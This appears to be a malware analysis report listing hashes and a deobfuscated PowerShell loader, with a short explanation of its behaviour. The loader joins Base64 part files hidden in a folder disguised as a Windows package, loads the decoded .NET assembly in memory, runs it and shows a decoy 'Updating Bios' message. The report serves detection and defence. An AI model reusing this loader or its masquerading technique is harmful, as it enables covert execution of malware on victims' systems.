| Hash | Hash Value |
|---|---|
| MD5 | 2b04f5e11f985670bb5bf4d87409aebd |
| Sha1 | d7a82babebe7c46a736e8fd337bd49ac570eb553 |
| Sha256 | d3ef9f47ab20192f4f1acb7098a4481f2faca5778e3e31e8aa61414af87328d7 |
| Sha384 | 117c01ff202f0d3684def8fa9eccd310d73691db36aa07faef71eb7664ae00524a6720c8d57beb119f6daffb621a7d63 |
| Sha512 | 914cbe829a6486072be87cd1d5725c95068b2115504869c93357e1d2951c4e0d93c4051a7b35d51ecc5fb1b7ee5c32b14d080e2a46f6441093b45197c68641b7 |
| SSDeep | 12:MABu0bJ64iaucuxyGAH2TSlqxd3pj//pnZY8VjSsKQRDOW5T0uiyhhv:u0bwt5c5GC2dTx3pni8EsKEyW5Diyb |
| TLSH | E551DD0E5517469D27F216BABD112C08E80C461FC15D2865B88C53C01F2A5644823EDC |
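| Name0 | Value |
|---|---|
| Deobfuscated PowerShell | `$dir = "$env:LOCALAPPDATA\Packages\Microsoft.WindowsSoundDiagnostics\Cache" $base64 = (1 .. 3 \| ForEach-Object Get-Content "$dir\part$_.txt" -Raw) -join "" $bytes = [Convert]::"FromBase64String"($base64) $asm = [Assembly]::"Load"($bytes) $ep = $asm."EntryPoint" if ($ep) { Write-Host "Updating Bios:" $ep."DeclaringType"."FullName" "::" $ep."Name" if ($ep."GetParameters"()."Count" -eq 0) { $ep."Invoke"($null, @({ } )) } else { $ep."Invoke"($null, @({ [string[]] @({ } ) } )) } } else { Write-Host "No entry point found." }` |

Note: as shown, the script joins `part1.txt` through `part3.txt` from the `Cache` directory into one Base64 string, decodes it, loads the result in memory as a .NET assembly via `[Assembly]::Load`, and invokes its entry point; the script itself does not write the decoded assembly to disk. The part-file path under `%LOCALAPPDATA%\Packages\Microsoft.WindowsSoundDiagnostics\Cache` and the "Updating Bios:" console message are the host-side artifacts visible in this sample, and the directory name appears chosen to resemble a legitimate Windows package.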
| Name0 | Value | Location |
|---|---|---|
| Deobfuscated PowerShell | `$dir = "$env:LOCALAPPDATA\Packages\Microsoft.WindowsSoundDiagnostics\Cache" $base64 = (1 .. 3 \| ForEach-Object Get-Content "$dir\part$_.txt" -Raw) -join "" $bytes = [Convert]::"FromBase64String"($base64) $asm = [Assembly]::"Load"($bytes) $ep = $asm."EntryPoint" if ($ep) { Write-Host "Updating Bios:" $ep."DeclaringType"."FullName" "::" $ep."Name" if ($ep."GetParameters"()."Count" -eq 0) { $ep."Invoke"($null, @({ } )) } else { $ep."Invoke"($null, @({ [string[]] @({ } ) } )) } } else { Write-Host "No entry point found." }` Malicious | Part3.Resolution |